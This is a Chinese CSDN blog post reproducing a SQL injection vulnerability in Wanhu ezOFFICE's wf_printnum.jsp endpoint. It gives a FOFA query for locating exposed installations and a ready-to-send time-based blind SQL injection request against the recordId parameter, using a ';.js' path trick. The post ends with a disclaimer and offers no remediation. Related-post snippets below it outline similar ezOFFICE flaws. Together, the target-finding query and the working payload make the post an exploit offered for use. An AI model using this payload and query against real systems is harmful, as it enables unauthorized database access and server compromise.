【漏洞复现】万户 ezOFFICE wf_printnum.jsp SQL注入漏洞

最新推荐文章于 2024-04-26 14:00:07 发布
最新推荐文章于 2024-04-26 14:00:07 发布
阅读量323 收藏
点赞数 17
分类专栏: 漏洞复现 文章标签: java sql 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/137084617
版权

0x01 产品简介

万户OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效提高工作效率。

0x02 漏洞概述

万户 ezOFFICE wf_printnum.jsp 接口存在SQL注入漏洞,恶意攻击者可利用此漏洞获取数据库信息,获取服务器控制权限。

0x03 测绘语句

fofa: app="万户网络-ezOFFICE"

0x04 漏洞复现

GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:2%27-- HTTP/1.1

0x05 影响范围

万户 ezOFFICE

0x06 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

从不学安全
关注
  • 17
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
万户 ezOFFICE wf_process_attrelate_aiframe.jsp SQL注入漏洞
m0_50797689的博客
01-23 687
万户 ezOFFICE wf_process_attrelate_aiframe.jsp 未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。2、仅允许可信ip访问 /defaultroot/platform/bpm/work_flow/process/wf_process_attrelate_aiframe.jsp 此路由。OA ezoffice万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品。
万户ezOFFICE数据字典
04-02
万户ezOFFICE数据字典
ezOFFICE协同管理平台使用手册_1.pdf
09-26
ezOFFICE协同管理平台使用手册_1.pdf
ezOFFICE安装手册(linux版).doc
11-30
ezOFFICE安装手册(linux版).doc
万户OA ezOFFICE wf_printnum.jsp 接口SQL注入漏洞
weixin_52204925的博客
01-20 427
万户OA ezOFFICE wf_printnum.jsp 接口SQL注入漏洞
万户ezOFFICE-wf_printnum.jsp存在SQL注入漏洞
wan___she__pi的博客
04-05 311
万户EZOFFICE是一款办公软件,由中国万户网络科技有限公司开发和提供。该软件提供了一系列办公管理工具,包括文档管理、协作编辑、任务管理、日程安排、邮件通讯等功能,旨在提高团队的协作效率和工作效率。万户ezOFFICE-wf_printnum.jsp存在SQL注入漏洞存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。app="万户ezOFFICE协同管理平台"
万户 ezOFFICE wf_process_attrelate_aiframe.jsp SQL注入漏洞复现
0xSec
01-21 393
万户 ezOFFICEwf_process_attrelate_aiframe.jsp 存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
(1day)某户EZOFFICE wf_printnum.jspSQL注入漏洞(CVE-2024-1012)
onyourleft666的博客
02-02 454
Wanhu ezOFFICE 11.1.0中的一个严重漏洞被发现,该漏洞影响了文件defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp的某些未知处理过程。攻击者可以通过操纵参数recordId来进行SQL注入攻击。攻击可以远程启动。该漏洞已被公开披露,可能被利用。漏洞编号为CVE-2024-1012。
EzOffice.exe
06-14
Ashetch GPS数据格式转换,导入导出软件
mybatisPlus使用MetaObjectHandler对字段进行更新
m0_56356631的博客
04-23 286
都是符合我们的预期的。
string模拟实现
m0_73969414的博客
04-23 1409
c++中string的模拟实现,面试必会知识点
实现自定义注解、实现自定义幂等性注解
qq_44721738的博客
04-23 550
添加 Spring AOP 依赖。创建自定义注解。创建一个新的 Java 注解类,通过@interface关键字来定义,并可以添加元注解以及属性。@Target(ElementType.METHOD) //表示作用于方法上@Retention(RetentionPolicy.RUNTIME) // 表示这个注解在运行时是可见的,这样 AOP 代理才能在运行时读取到这个注解编写 AOP 拦截(自定义注解)的逻辑代码。@Aspect@Component// 方法执行前的处理。
javaweb-SpringBoot基础
kussm_的博客
04-20 1306
Spring的官网(Spring的简介:Spring makes Java simple。Spring Boot 可以帮助我们非常快速的构建应用程序、简化开发、提高效率。创建一个子包controller。
第5 章 Consul服务注册与发现
a13763926743的博客
04-22 750
consul官网地址。
迭代器模式
LuckFairyLuckBaby的博客
04-23 461
迭代器模式(Iterator),提供一种方法顺序访问一个聚合对象中各个元素,而又不暴露该对象的内部表示。
Java | 冒泡排序算法实现
yingzix688的博客
04-24 697
题目描述 编写一个Java程序,实现冒泡排序算法。程序需要能够接收一个整型数组作为输入,并输出排序后的数组。 冒泡排序是一种简单的排序算法,它重复地走访过要排序的数列,一次比较两个元素,如果他们的顺序错误就把他们交换过来。走访数列的工作是重复地进行直到没有再需要交换,也就是说该数列已经排序完成。
java通过Comparator比较器对集合进行多属性连续分组内升降排序,以及null空值排最前或最后
hkl_Forever的博客
04-26 135
一、排序数据准备,分别对 one、two、three 三个属性进行连续分组内排序。连续排序,并且把被排序属性值为null的排在最后。连续排序,并且把被排序属性值为null的排在最后。
@Value
最新发布
思索的涟漪,突破自我
04-26 165
Value注解是 Spring 框架中的一个注解,用于从属性文件、环境变量、Java 系统属性等地方读取值,并将这些值注入到 Spring 管理的 Bean 中。
Java并发知识总结 | 第八篇】Java并发线程知识总结
个银二粒的成长之路
04-21 1706
Java并发线程知识总结
万户 ezoffice 文件上传漏洞复现
12-17
万户ezoffice是一个办公软件,用于处理各种办公文档。文件上传漏洞是指系统存在一个安全漏洞,允许攻击者在上传文件时注入恶意代码或者上传非法文件到服务器中。这个问题的产生可能是开发过程中没有充分考虑安全性,或者是没有对用户上传的文件进行正确的校验和过滤操作。 想要复现这个漏洞,可以按照以下步骤进行: 1. 准备一个万户ezoffice的测试环境,包括安装相关软件和配置服务器环境。 2. 创建一个测试账号,并登录到系统中。 3. 在系统中找到文件上传的功能,并尝试上传一个文件。可以选择一个存在恶意代码的文件,例如一个带有JavaScript注入的HTML文件。 4. 观察系统的反应。如果文件上传成功,并且系统没有对文件进行正确的处理和过滤,那么就证明存在文件上传漏洞。 5. 尝试利用漏洞进行攻击,可以尝试上传一个病毒文件,或者注入一段恶意代码到服务器中。 6. 观察系统的反应和功能是否受到影响,以及漏洞的程度和影响范围。 在复现漏洞后,可以通过以下方法来修复和防止这个漏洞: 1. 对用户上传的文件进行严格的校验和过滤,确保只有合法的文件和内容能够被上传和处理。 2. 对文件内容进行安全扫描和检测,以防止上传病毒文件或者含有恶意代码的文件。 3. 在文件上传的功能上添加访问控制和权限验证,确保只有经过认证的用户才能进行文件上传操作。 4. 定期对系统进行安全审计和漏洞扫描,及时发现和修复潜在的安全问题。 5. 提高开发人员的安全意识和安全知识,确保在软件开发和设计中充分考虑安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值